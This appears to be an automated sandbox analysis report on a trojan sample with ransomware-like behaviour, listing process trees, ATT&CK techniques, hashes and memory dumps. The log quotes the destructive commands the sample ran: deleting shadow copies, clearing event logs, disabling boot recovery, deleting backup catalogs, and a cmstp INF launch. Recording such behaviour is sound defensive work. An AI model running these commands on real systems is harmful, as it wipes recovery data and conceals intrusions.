Token: SeRestorePrivilege	4712	wbengine.exe
Token: SeSecurityPrivilege	4712	wbengine.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 3524 wrote to memory of 4200	3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe	80
PID 3524 wrote to memory of 4200	3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe	80
PID 3812 wrote to memory of 2488	3812	cmd.exe	84
PID 3812 wrote to memory of 2488	3812	cmd.exe	84
PID 2488 wrote to memory of 2748	2488	mesthh4q.exe	89
PID 2488 wrote to memory of 2748	2488	mesthh4q.exe	89
PID 2488 wrote to memory of 3656	2488	mesthh4q.exe	91
PID 2488 wrote to memory of 3656	2488	mesthh4q.exe	91
PID 3656 wrote to memory of 3936	3656	cmd.exe	93
PID 3656 wrote to memory of 3936	3656	cmd.exe	93
PID 3656 wrote to memory of 4564	3656	cmd.exe	96
PID 3656 wrote to memory of 4564	3656	cmd.exe	96
PID 3656 wrote to memory of 2288	3656	cmd.exe	97
PID 3656 wrote to memory of 2288	3656	cmd.exe	97
PID 3656 wrote to memory of 1488	3656	cmd.exe	98
PID 3656 wrote to memory of 1488	3656	cmd.exe	98
PID 3656 wrote to memory of 4892	3656	cmd.exe	100
PID 3656 wrote to memory of 4892	3656	cmd.exe	100
PID 3656 wrote to memory of 4352	3656	cmd.exe	102
PID 3656 wrote to memory of 4352	3656	cmd.exe	102
PID 3656 wrote to memory of 1760	3656	cmd.exe	103
PID 3656 wrote to memory of 1760	3656	cmd.exe	103
PID 3656 wrote to memory of 5088	3656	cmd.exe	104
PID 3656 wrote to memory of 5088	3656	cmd.exe	104

C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
"C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3524
- \??\c:\windows\system32\cmstp.exe
  "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\clye5h5t.inf
  2⤵
  PID:4200

C:\Windows\system32\cmd.exe
cmd /c start C:\Windows\temp\mesthh4q.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:3812
- C:\Windows\temp\mesthh4q.exe
  C:\Windows\temp\mesthh4q.exe
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Executes dropped EXE
  - Modifies extensions of user files
  - Windows security modification
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2488
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2748
- - C:\Windows\system32\cmd.exe
    "cmd.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3656
  - - C:\Windows\system32\vssadmin.exe
      vssadmin.exe delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:3936
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4564
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl Application
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:2288
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl Security
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:1488
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl System
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:4892
  - - C:\Windows\system32\bcdedit.exe
      Bcdedit.exe /set {default} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:4352
  - - C:\Windows\system32\bcdedit.exe
      Bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1760
  - - C:\Windows\system32\wbadmin.exe
      wbadmin delete catalog
      4⤵
      Deletes backup catalog
      Drops file in Windows directory
      PID:5088

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1264

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:176

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4712

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:3380

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:3060

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Indicator Removal on Host

T1070

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\42bdbff4-2e20-4168-9b00-6137d5d5603f\AgileDotNetRT64.dll

Filesize
75KB

MD5
42b2c266e49a3acd346b91e3b0e638c0

SHA1
2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

SHA256
adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

SHA512
770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

Download Submit
C:\Windows\Temp\mesthh4q.exe

Filesize
449KB

MD5
1db0b6b8d8429a19745386172720b241

SHA1
bbe8ca48fecc9ee2e909a453e60bda1548b85898

SHA256
0c903b0104a81695efd95240e79ba5d93cabae598acd193ac5f629d6ca10653d

SHA512
e483213f1e64243a8f72b75dfca4dd6998122ddf08317849d4402d118dd39a5859e60cc880523573794809a06ef4b61a36c3113d80a289277828a5340042255e

Download Submit
C:\Windows\temp\clye5h5t.inf

Filesize
583B

MD5
8c0db96fe81b49ba6bd3508ef807a890

SHA1
aa452d23a161f21cfa7844ec9ea530433e4b6314

SHA256
646de5e32d78a2e858437cf8d9c8a568602df6bfa7779d1b539f3483662b77cf

SHA512
bf8091e46ca71ec821e624825c68a6c07fc0b1c5f3aea8cf4e3a539185fc5823a8b49d975825478415a2f284e32fe5f2b648ed315d5e769569dac82e096d50ea

Download Submit
C:\Windows\temp\mesthh4q.exe

Filesize
449KB

MD5
1db0b6b8d8429a19745386172720b241

SHA1
bbe8ca48fecc9ee2e909a453e60bda1548b85898

SHA256
0c903b0104a81695efd95240e79ba5d93cabae598acd193ac5f629d6ca10653d

SHA512
e483213f1e64243a8f72b75dfca4dd6998122ddf08317849d4402d118dd39a5859e60cc880523573794809a06ef4b61a36c3113d80a289277828a5340042255e

Download Submit
memory/2488-143-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

Filesize
10.8MB

Download
memory/2488-150-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

Filesize
10.8MB

Download
memory/2488-142-0x0000000000E20000-0x0000000000E96000-memory.dmp

Filesize
472KB

Download
memory/2748-147-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

Filesize
10.8MB

Download
memory/2748-145-0x00000224F5450000-0x00000224F5472000-memory.dmp

Filesize
136KB

Download
memory/2748-146-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

Filesize
10.8MB

Download
memory/3524-138-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

Filesize
10.8MB

Download
memory/3524-132-0x00000000002F0000-0x000000000037E000-memory.dmp

Filesize
568KB

Download
memory/3524-137-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

Filesize
10.8MB

Download
memory/3524-134-0x00007FFA03A80000-0x00007FFA03BCE000-memory.dmp

Filesize
1.3MB

Download